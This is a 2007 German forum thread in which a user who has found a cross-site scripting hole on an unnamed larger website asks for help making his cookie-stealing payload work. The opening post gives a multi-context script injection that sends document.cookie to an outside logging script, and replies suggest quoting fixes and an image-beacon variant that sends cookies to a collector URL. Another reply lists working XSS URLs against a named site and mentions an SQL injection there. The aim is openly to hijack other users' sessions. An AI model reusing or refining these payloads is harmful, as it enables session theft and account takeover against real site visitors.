Problem mit XSS

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Roadkiller, 23. Juni 2007 .

  1. 23. Juni 2007
    Hi, ich hab eine XSS Lücke in einer etwas größeren Seite gefunden. Die Lücke lässt sich leider nur mit stark modifizierten Javascriptcode ausführen und dahen gibts ein kleines Problem. Der aktuelle Code ist wie folgt:
    Code:
    ';document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//\';document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//";document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//\";document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//--></SCRIPT>">'><SCRIPT>document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")</SCRIPT>
    Nur das Problem ist das ich jetzt nur folgenden Inhalt in meiner cookielogdatei bekomme:
    Code:
    \\\" document.cookie \\\"
    Wer mir beim Problem hilft bekommt die Lücke als kleines Dankeschön natürlich auch per PN und eine nette Bewertung von mir und vielleicht auch von Crewmembern.
    MfG Roadkiller
     
  2. 23. Juni 2007
    AW: Problem mit XSS

    alert befehle gehen aber ohne probleme, er kann auch den cookie mit alert(document.cookie) ausgeben
     
  3. 23. Juni 2007
    AW: Problem mit XSS

    probiers dochma ohne " und '
    also
    document.write('part1vondeinemimg-code'); (das wird ja richtig geschrieben..
    document.write(document.cookie);
    document.write('der rest " />');
    oder so.. ^^
    oder geht das so nich?
     
  4. 23. Juni 2007
    AW: Problem mit XSS

    a propos, die xss lücken bei technorocker sind nicht behoben:

    http://technorocker.info/tracks.php?a=>"><ScriPt >alert('xss by b0b')%3B%3C/ScriPt%3E
    http://technorocker.info/tracks.php?a=>"><scrIpt>alert('xss by b0b')</scrIpt>
    http://technorocker.info/tracks.php?b=>"><scrIpt>alert('xss by b0b')</scrIpt>

    ausserdem ist die GET-variablen "e" sql-injection anfällig..

    technorockr wurde informiert
     
  5. 23. Juni 2007
    AW: Problem mit XSS

    telefonzelle, ne dann geht das überhaupt nicht mehr
     
  6. 23. Juni 2007
    AW: Problem mit XSS

    Andere Variante:

    Anstelle von document.write einfach
    n neues Bild machen:

    var img = new Image();
    img.src = 'http://cookie/saver.php?'+document.cookie;

    ?
     
  7. 23. Juni 2007
    AW: Problem mit XSS

    ne das hilft mir auch nicht weiter
    Kennt sich den niemand richtig gut mit XSS und Javascript aus?
     
  8. 24. Juni 2007
    AW: Problem mit XSS

    Wenn du uns nicht verräts wo die Lücke ist könnten wir(ich) schlecht ausprobieren,
    also post doch url oder schick sie per pn

    mfg

    rushzero
     
  9. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.